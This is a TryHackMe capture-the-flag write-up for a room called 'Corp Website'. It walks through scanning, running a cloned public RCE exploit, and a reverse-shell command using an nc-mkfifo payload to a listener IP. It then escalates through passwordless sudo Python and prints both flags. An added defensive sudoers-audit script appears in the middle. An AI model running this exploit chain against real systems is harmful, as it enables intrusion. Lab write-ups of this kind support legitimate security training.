Room Information

  • Platform: TryHackMe
  • Room: Corp Website
  • Difficulty: Medium
  • Category: Web Exploitation / Privilege Escalation
  • Points: 200

Introduction:

The objective of this room was to investigate and exploit vulnerabilities present in the "Romance & Co" website environment. The challenge simulated a real-world breach scenario in which incomplete logs, vulnerable services and a weak privilege environment let attackers compromise the target machine.

The goal was to:

  1. Enumerate the machine
  2. Discover Vulnerabilities
  3. Gain initial access
  4. Escalate Privileges
  5. Capture both user and root flags.

This write-up explains the complete approach I took, from reconnaissance to obtaining root access, to solve this challenge.

Initial Reconnaissance:

The first step was port scanning and enumeration using nmap.

nmap -sC -sV corp.thm -Pn

Explanation:

  • -sC → Run default NSE scripts
  • -sV → Service version detection
  • -Pn → Treat host as online

At first, all the ports appeared filtered.

This indicates:

  • A firewall may be active
  • The web application may be running on a non-standard port
  • Enumeration should continue using direct IP and known web ports

Vulnerability Scanning:

After the basic reconnaissance, I used nuclei to look for known vulnerabilities.

nuclei -u http://10.48.174.200:3000

Nuclei detected:

[CVE-2025-55184] [http] [high]

This was the major breakthrough.

The scan indicates that the web application is vulnerable to remote code execution.

Exploit Research:

After identifying the CVE, I searched online for a public exploit.

git clone https://github.com/Chocapikk/CVE-2025-55182.git

Then I entered the directory.

cd CVE-2025-55182

Setting Up Python Environment:

The exploit needed Python dependencies, so I created a virtual environment for them.

python3 -m venv .venv

source .venv/bin/activate

Exploiting the Target:

Once the dependencies were installed successfully, I executed the exploit.

This confirms the successful Remote Code Execution on the target.

Reading user.txt:

I found the user flag at /home/daniel/user.txt.

THM{R34c7_2_5h311_3xpl017}

User flag captured successfully. The next objective was privilege escalation to root.

Privilege Escalation Enumeration:

During local enumeration, sudo -l revealed a dangerous sudo misconfiguration.

The user daniel could execute Python as root without a password.
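
A defender-side check for the misconfiguration described above, as an added example that is not part of the original write-up: it scans sudoers-style rules for passwordless, run-as-root access to interpreters. The rule lines in SAMPLE are constructed, and audit_sudoers and the INTERPRETERS list are hypothetical names chosen for this example.

```python
import os
import re
# Binaries that give arbitrary code execution when allowed through sudo.
INTERPRETERS = {"python", "perl", "ruby", "node", "php", "lua",
                "sh", "bash", "dash", "zsh"}
SKIP = ("#", "Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")
RULE = re.compile(r"^(\S+)\s+(\S+?)\s*=\s*(.+)$")
RUNAS = re.compile(r"^\(([^)]*)\)\s*")
TAG = re.compile(r"^([A-Z_]+):\s*")

def audit_sudoers(text):
    """Return (line_no, user, command) for passwordless root interpreter rules."""
    # Simplified: no alias expansion, no backslash line continuations.
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        rule = RULE.match(line)
        if not rule or line.startswith(SKIP):
            continue
        user, _host, rest = rule.groups()
        runas_users = ["root"]                      # sudo's default target user
        runas = RUNAS.match(rest)
        if runas:
            rest = rest[runas.end():]
            runas_users = [u.strip() for u in runas.group(1).split(":")[0].split(",")]
        as_root = bool({"root", "ALL"} & set(runas_users))
        nopasswd = False
        for cmd in (c.strip() for c in rest.split(",")):
            tag = TAG.match(cmd)
            while tag:                              # tags persist for later commands
                if tag.group(1) in ("NOPASSWD", "PASSWD"):
                    nopasswd = tag.group(1) == "NOPASSWD"
                cmd = cmd[tag.end():]
                tag = TAG.match(cmd)
            if not cmd or cmd.startswith("!"):
                continue
            binary = re.sub(r"[\d.]+$", "", os.path.basename(cmd.split()[0]))
            if as_root and nopasswd and (cmd == "ALL" or binary in INTERPRETERS):
                findings.append((line_no, user, cmd))
    return findings

# Constructed sample, not the room's actual sudoers file.
SAMPLE = """\
root   ALL=(ALL:ALL) ALL
daniel ALL=(root) NOPASSWD: /usr/bin/python3
backup ALL=(root) NOPASSWD: /usr/bin/rsync, PASSWD: /usr/bin/perl
deploy ALL=(www-data) NOPASSWD: /usr/bin/python3
"""
print(audit_sudoers(SAMPLE))
```

Only the daniel rule is reported: the backup rule requires a password for perl, and the deploy rule runs Python as www-data rather than root.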

Obtaining Reverse Shell:

To make privilege escalation easier, I created a reverse shell.

python3 exploit.py -u http://10.48.174.200:3000 -r -l 192.168.141.224 -p 4444 -P nc-mkfifo

The target connected back successfully.

Privilege Escalation to Root:

Since I had a shell and Python could be executed as root, privilege escalation became straightforward.

Finally, I accessed the root flag using the command:

cat /root/root.txt

Root flag captured successfully.

THM{Pr1v_35c_47_175_f1n357}

Key Learnings:

This room demonstrated several important real-world security concepts:

1. Enumeration is Critical

Even when Nmap initially showed filtered ports, continuing enumeration led to discovering the vulnerable service.

2. Automated Scanning Helps

Tools like Nuclei can quickly identify known vulnerabilities and speed up the assessment process.

3. Public Exploits are Dangerous

Once a vulnerability becomes public, attackers can weaponize it rapidly.

4. Misconfigured Sudo Permissions

Allowing users to execute interpreters like Python as root without authentication is extremely dangerous.

5. Shell Stabilization Matters

Upgrading unstable reverse shells significantly improves post-exploitation workflow.

Conclusion:

The Corp Website room on TryHackMe was an excellent hands-on challenge that combined:

  • Web exploitation
  • Vulnerability assessment
  • Remote Code Execution
  • Reverse shells
  • Linux privilege escalation

The room effectively demonstrated how a single vulnerable web application combined with poor privilege management can lead to complete system compromise.

This challenge was a great practical learning experience for understanding real-world attack chains and post-exploitation techniques.

Author

Ankit Bhardwaj